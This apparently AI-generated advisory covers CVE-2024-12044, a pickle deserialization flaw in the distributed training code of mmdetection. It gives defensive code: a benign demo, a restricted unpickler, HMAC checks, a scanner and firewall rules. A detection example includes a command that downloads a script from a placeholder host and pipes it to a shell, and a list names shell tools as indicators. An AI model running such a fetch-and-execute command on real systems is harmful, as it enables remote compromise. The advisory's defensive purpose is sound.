CVE-2024-12044 Overview
CVE-2024-12044 is a remote code execution vulnerability in open-mmlab/mmdetection v3.3.0, an open-source object detection toolbox built on PyTorch. The flaw exists in the all_reduce_dict() distributed training API, which calls pickle.loads() on untrusted data without validation. An attacker on the distributed training network can broadcast a malicious serialized payload to trigger arbitrary code execution on participating nodes. The vulnerability is classified under CWE-502: Deserialization of Untrusted Data.
Critical Impact
Attackers can execute arbitrary code on distributed training workers by broadcasting a crafted pickle payload, compromising confidentiality, integrity, and availability of GPU training clusters.
Affected Products
- open-mmlab/mmdetection v3.3.0
- Distributed training deployments using the all_reduce_dict() API
- PyTorch-based training clusters that integrate the affected module
Discovery Timeline
- 2025-03-20 - CVE-2024-12044 published to the National Vulnerability Database (NVD)
- 2026-04-15 - Last updated in NVD
Technical Details for CVE-2024-12044
Vulnerability Analysis
The vulnerability resides in the all_reduce_dict() function within the distributed training utilities of mmdetection. This API is used to synchronize dictionary objects across worker nodes during multi-GPU or multi-node training. To exchange complex Python objects across processes, the function serializes payloads with pickle and reconstructs them on receiving nodes using pickle.loads().
Python's pickle module executes arbitrary callables defined within the byte stream during deserialization. When pickle.loads() operates on attacker-controlled bytes, it can invoke __reduce__ methods that spawn subprocesses, write files, or import arbitrary modules. The mmdetection implementation performs no integrity verification, authentication, or type filtering before deserialization.
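The behavior described above can be reproduced with a harmless stand-in. The sketch below is illustrative only and is not taken from mmdetection or the Huntr report: the Demo class is hypothetical, and the callable is the benign built-in int rather than anything an attacker would choose.

```python
import pickle


class Demo:
    """Hypothetical, harmless stand-in for a crafted object."""

    def __reduce__(self):
        # pickle records "call this callable with these arguments" in the
        # byte stream; the receiver performs the call while loading.
        return (int, ("42",))


blob = pickle.dumps(Demo())

# Loading the bytes invokes int("42") and returns its result
# instead of reconstructing a Demo instance.
result = pickle.loads(blob)
print(type(result).__name__, result)
```

Replacing int with a process-spawning callable is the only change an attacker needs, which is why the received bytes have to be treated as code rather than data.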
Deserialization runs in the context of the training process, which typically holds privileged access to GPU resources, model weights, training datasets, and credentials for cloud storage or experiment tracking platforms. The high EPSS percentile reflects the well-understood exploitability of pickle deserialization issues.
Root Cause
The root cause is the unconditional invocation of pickle.loads() on data received from peer processes in a distributed collective operation. The code treats inter-node communication as trusted, but a malicious or compromised peer, a network attacker positioned between nodes, or a poisoned training input pipeline can supply a crafted byte stream.
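One form of the missing type filtering is an unpickler that refuses every global lookup. The sketch below follows the pattern from the Python documentation for restricting globals; NoGlobalsUnpickler and restricted_loads are hypothetical names, this is not the upstream fix, and the Python documentation cautions that restricting globals reduces risk without making pickle safe for hostile input.

```python
import io
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Hypothetical helper: refuses every class or function lookup."""

    def find_class(self, module, name):
        # Lists, dicts, strings and numbers are encoded with dedicated
        # opcodes and never reach this method; callables always do.
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    """Deserialize plain containers only (assumed helper name)."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


class Demo:
    def __reduce__(self):
        return (int, ("42",))  # benign stand-in for a malicious callable


# A plain list of dictionary keys still round-trips.
print(restricted_loads(pickle.dumps(["loss_cls", "loss_bbox"])))

# A stream that asks for a callable is rejected before anything runs.
try:
    restricted_loads(pickle.dumps(Demo()))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

Denying all lookups is workable here only under the assumption that the exchanged objects are plain containers of strings and numbers. Anything richer would need an explicit allow-list.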
Attack Vector
An attacker who can inject data into the distributed training collective broadcasts a pickle payload whose __reduce__ returns a tuple invoking os.system, subprocess.Popen, or eval. When all_reduce_dict() deserializes the payload on each rank, the embedded callable executes immediately under the training user's identity. Exploitation requires no user interaction and, when inter-node traffic is unprotected, no authentication.
The vulnerability mechanism is described in the Huntr Bounty Report. The data available for this advisory references no public proof-of-concept code.
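Because the attack relies on receivers accepting unauthenticated bytes, one possible defense is to attach a keyed tag to every payload and verify it before any decoding. The following is a minimal sketch using the standard hmac module; seal, open_sealed, and the pre-shared key are assumptions for illustration, not part of mmdetection or torch.distributed. It does not stop a compromised rank that already holds the key, and it offers no replay protection.

```python
import hashlib
import hmac

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes for SHA-256


def seal(payload: bytes, key: bytes) -> bytes:
    """Prefix the payload with an HMAC-SHA256 tag (hypothetical helper)."""
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return tag + payload


def open_sealed(message: bytes, key: bytes) -> bytes:
    """Return the payload only if its tag verifies; otherwise raise."""
    if len(message) < TAG_LEN:
        raise ValueError("message shorter than authentication tag")
    tag, payload = message[:TAG_LEN], message[TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    # compare_digest avoids leaking the mismatch position through timing.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication tag mismatch; payload discarded")
    return payload


key = b"example-shared-secret"  # placeholder; distribute real keys out of band
sealed = seal(b'["loss_cls", "loss_bbox"]', key)
print(open_sealed(sealed, key))

# Flipping one bit of the payload makes verification fail.
tampered = sealed[:-1] + bytes([sealed[-1] ^ 1])
try:
    open_sealed(tampered, key)
except ValueError as exc:
    print("rejected:", exc)
```

Verification has to happen before deserialization. Checking the tag after the bytes have been loaded provides no protection.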
Detection Methods for CVE-2024-12044
Indicators of Compromise
- Unexpected child processes such as sh, bash, python -c, or curl spawned by the mmdetection training process during all_reduce collective operations
- Outbound network connections initiated by training workers to non-allowlisted hosts shortly after distributed synchronization phases
- Unusual file writes under home directories, /tmp, or model checkpoint paths originating from the training process
- Modifications to Python site-packages or training scripts on worker nodes without an authorized deployment event
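The first indicator above can be turned into a simple triage rule over process-creation events. The sketch below assumes events are available as parent and child command-line strings. The marker strings, the set of suspicious executables, and the is_suspicious helper are all hypothetical and would need tuning, since some training setups legitimately spawn helper processes.

```python
import os
import shlex

# Assumed markers and names; tune both to the local environment.
TRAINING_MARKERS = ("tools/train.py", "torchrun")
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "curl", "wget"}


def is_suspicious(parent_cmdline: str, child_cmdline: str) -> bool:
    """Flag shells, network clients, or `python -c` under a training parent."""
    if not any(marker in parent_cmdline for marker in TRAINING_MARKERS):
        return False
    argv = shlex.split(child_cmdline)
    if not argv:
        return False
    exe = os.path.basename(argv[0])
    if exe in SUSPICIOUS_CHILDREN:
        return True
    return exe.startswith("python") and "-c" in argv[1:]


# Illustrative events; the config path and address are placeholders.
parent = "python tools/train.py configs/example.py --launcher pytorch"
for child in (
    "/bin/bash -c 'curl http://198.51.100.7/x | sh'",
    "python3 -c 'import os'",
    "nvidia-smi --query-gpu=name --format=csv",
):
    print(is_suspicious(parent, child), child)
```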
Detection Strategies
- Hunt for pickle.loads invocations on tensors or buffers received over torch.distributed primitives within mmdetection code paths
- Alert on training processes executing shell interpreters or network clients, which are not part of normal training behavior
- Inspect distributed training logs for deserialization exceptions or rank-specific crashes that may indicate failed exploitation attempts
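The code hunt in the first strategy can be partly automated with a static scan. The following sketch uses the standard ast module to list pickle.loads and pickle.load call sites in Python source. find_pickle_loads is a hypothetical helper, and it only matches the direct pickle.<name>(...) form, so aliased imports such as `from pickle import loads` are missed and need a separate search.

```python
import ast

UNSAFE_CALLS = {("pickle", "loads"), ("pickle", "load")}


def find_pickle_loads(source: str, filename: str = "<string>"):
    """Return sorted (line number, call name) pairs for direct pickle loads."""
    tree = ast.parse(source, filename=filename)
    hits = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if (
            isinstance(func, ast.Attribute)
            and isinstance(func.value, ast.Name)
            and (func.value.id, func.attr) in UNSAFE_CALLS
        ):
            hits.append((node.lineno, f"{func.value.id}.{func.attr}"))
    return sorted(hits)


# Illustrative input, not copied from mmdetection.
sample = "\n".join(
    [
        "import pickle",
        "",
        "def tensor_to_obj(buf):",
        "    return pickle.loads(buf)",
    ]
)
print(find_pickle_loads(sample))
```

To scan an installation, the same function could be applied to each file returned by pathlib.Path(root).rglob("*.py"), with each hit then reviewed by hand to see whether the argument originates from a torch.distributed receive.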
Monitoring Recommendations
- Enable process lineage and command-line telemetry on all GPU training hosts and forward to a central analytics platform
- Monitor egress traffic from training clusters against an allowlist of model registries, dataset stores, and experiment trackers
- Capture file integrity events for the mmdetection installation directory and shared dataset volumes
How to Mitigate CVE-2024-12044
Immediate Actions Required
- Restrict distributed training traffic to isolated network segments and authenticate traffic between ranks, for example with an encrypted overlay such as IPsec or WireGuard
- Run training workloads as unprivileged users in containers with read-only code mounts and no outbound internet access unless required
- Audit any custom forks or downstream projects that import all_reduce_dict() and replace pickle with a safe serializer such as safetensors, msgpack, or JSON for dictionary synchronization
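For the serializer replacement in the last item, a data-only format with explicit validation is usually enough when only dictionary keys need to travel as Python objects. The sketch below uses JSON and assumes the keys are strings and the values are exchanged separately as tensors. encode_keys and decode_keys are hypothetical helpers, not mmdetection APIs.

```python
import json


def encode_keys(keys) -> bytes:
    """Serialize dictionary keys as a UTF-8 JSON array of strings."""
    keys = list(keys)
    if not all(isinstance(k, str) for k in keys):
        raise TypeError("only string keys are supported")
    return json.dumps(keys).encode("utf-8")


def decode_keys(data: bytes) -> list:
    """Parse and validate keys; JSON decoding never invokes callables."""
    keys = json.loads(data.decode("utf-8"))
    if not isinstance(keys, list) or not all(isinstance(k, str) for k in keys):
        raise ValueError("expected a JSON array of strings")
    return keys


wire = encode_keys({"loss_cls": 0.7, "loss_bbox": 0.2})
print(decode_keys(wire))

# Well-formed JSON of the wrong shape is rejected by the validation step.
try:
    decode_keys(b'{"not": "a list"}')
except ValueError as exc:
    print("rejected:", exc)
```

The resulting bytes can be carried in a uint8 buffer in the same way pickled bytes would be, so the surrounding collective logic does not need to change.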
Patch Information
The data available for this advisory does not reference a fixed version. Operators should consult the upstream open-mmlab/mmdetection repository and the Huntr Bounty Report for remediation status and apply the latest release once available. Until a patch is published, avoid running v3.3.0 in environments where peer nodes or network paths cannot be fully trusted.
Workarounds
- Disable or avoid the all_reduce_dict() API and replace it with collective operations that exchange tensors only, never pickled Python objects
- Place training nodes inside a dedicated VPC or VLAN with strict ingress and egress rules to prevent untrusted peers from joining the collective
- Apply pod-level security controls, such as seccomp, AppArmor, or SELinux profiles, that prevent the training process from executing shell binaries
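# Example: restrict torch.distributed traffic to an isolated subnet
# (interface names and addresses are placeholders)
export MASTER_ADDR=10.42.0.1
export MASTER_PORT=29500
export NCCL_SOCKET_IFNAME=eth1 # private training NIC only
export GLOO_SOCKET_IFNAME=eth1
# Allow training traffic only within the private subnet on eth1
iptables -A OUTPUT -o eth1 -d 10.42.0.0/24 -j ACCEPT
iptables -A OUTPUT -o eth1 -j REJECT
# Block all egress on the public NIC; insert ACCEPT rules for required
# dataset and registry endpoints before this rule
iptables -A OUTPUT -o eth0 -j REJECT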
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


